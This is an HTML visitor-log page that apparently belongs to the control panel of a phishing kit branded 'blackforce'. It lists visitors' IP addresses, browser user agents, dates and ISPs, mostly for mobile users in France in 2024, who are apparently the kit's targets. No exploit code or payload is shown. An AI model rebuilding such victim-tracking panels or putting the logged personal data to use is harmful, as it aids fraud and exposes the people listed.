<!doctype html>
<html>

<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <link rel="shortcut icon" href="./app/Panel/assets/favicon.ico" type="image/x-icon">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="robots" content="noindex," "nofollow," "noimageindex," "noarchive," "nocache," "nosnippet">
    <!-- CSS FILES -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css">
    <title>Visitors</title>
    <link rel="stylesheet" href="app/Panel/assets/css/master.css">

    <style>
        @import url('https://fonts.googleapis.com/css2?family=Inconsolata&family=Roboto:wght@100;900&display=swap');
        * {
            padding: 0;
            margin: 0;
            font-family: sans-serif;
            font-size: 12px;
        }
        
        nav {
            width: 100%;
            height: 130px;
            border-radius: 0;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            border-bottom: 4px solid #009636;
            margin-bottom: 80px;
            position: relative;
        }
        
        #particles-js {
            height: 100%;
            width: 100%;
            background-color: #000;
            position: absolute;
            z-index: -1;
            top: 0;
        }
        
        .bg-op {
            background: #265e412e;
            width: 100%;
            height: 100%;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
        }
        
        .img1 {
            width: 80px;
        }
        
        .img2 {
            width: 160px;
        }
    </style>
</head>

<body>
    <nav>
        <div id="particles-js">
        </div>
        <script src="app/Panel/assets/js/particles.js"></script>
        <script src="app/Panel/assets/js/app.js"></script>
        <div class="bg-op">

            <img class="img1" src="./app/Panel/assets/hacker-25929.png" alt="" srcset="">
            <img class="img2" src="./app/Panel/assets/blackforce.png" alt="" srcset="">

        </div>
    </nav>
    <div class="container-fluid">
        <table class="table table-striped table-sm table-borderless">
            <thead>
                <tr>
                    <th style="font-weight: 900!important;">Country</th>
                    <th style="font-weight: 900!important;">IP</th>
                    <th style="font-weight: 900!important;">User Agent</th>
                    <th style="font-weight: 900!important;">Date</th>
                    <th style="font-weight: 900!important;">Isp's</th>
                </tr>
            </thead>
    </div><tr><td class="flag"><div class="bf-flag bf-flag-"></div></td><td>127.0.0.1</td><td>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36</td><td>2024-01-20 19:55:37</td><td></td></tr><tr><td class="flag"><div class="bf-flag bf-flag-fr"></div></td><td>84.102.227.25</td><td>Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1</td><td>2024-03-03 16:21:27</td><td>AS15557 Societe Francaise Du Radiotelephone - SFR SA</td></tr><tr><td class="flag"><div class="bf-flag bf-flag-fr"></div></td><td>80.215.32.109</td><td>Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.1</td><td>2024-03-03 19:48:47</td><td>AS5410 Bouygues Telecom SA</td></tr><tr><td class="flag"><div class="bf-flag bf-flag-fr"></div></td><td>80.215.32.109</td><td>Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.1</td><td>2024-03-03 19:54:09</td><td>AS5410 Bouygues Telecom SA</td></tr><tr><td class="flag"><div class="bf-flag bf-flag-fr"></div></td><td>90.127.140.229</td><td>Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1</td><td>2024-03-04 11:29:25</td><td>AS3215 Orange S.A.</td></tr><tr><td class="flag"><div class="bf-flag bf-flag-mt"></div></td><td>92.251.116.37</td><td>Mozilla/5.0 (iPhone; CPU iPhone OS 17_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Mobile/15E148 Safari/604.1</td><td>2024-03-04 11:31:46</td><td>AS12709 Melita Limited</td></tr><tr><td class="flag"><div class="bf-flag bf-flag-bo"></div></td><td>143.137.113.5</td><td>Mozilla/5.0 (Linux; Android 13; SM-A325M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Mobile Safari/537.36</td><td>2024-03-04 12:08:17</td><td>AS262159 Digital TV CABLE DE EDMUND S.R.L.</td></tr><tr><td class="flag"><div class="bf-flag bf-flag-us"></div></td><td>172.59.112.44</td><td>Mozilla/5.0 (Linux; Android 14; SM-S908U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Mobile Safari/537.36</td><td>2024-03-04 12:09:11</td><td>AS21928 T-Mobile USA, Inc.</td></tr><tr><td class="flag"><div class="bf-flag bf-flag-fr"></div></td><td>90.127.140.229</td><td>Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1</td><td>2024-03-04 12:15:38</td><td>AS3215 Orange S.A.</td></tr><tr><td class="flag"><div class="bf-flag bf-flag-fr"></div></td><td>176.191.250.36</td><td>Mozilla/5.0 (iPhone; CPU iPhone OS 16_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.2 Mobile/15E148 Safari/604.1</td><td>2024-03-04 14:59:21</td><td>AS5410 Bouygues Telecom SA</td></tr><tr><td class="flag"><div class="bf-flag bf-flag-tn"></div></td><td>104.28.98.111</td><td>Mozilla/5.0 (iPhone; CPU iPhone OS 16_7_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1</td><td>2024-03-05 09:29:21</td><td>AS13335 Cloudflare, Inc.</td></tr>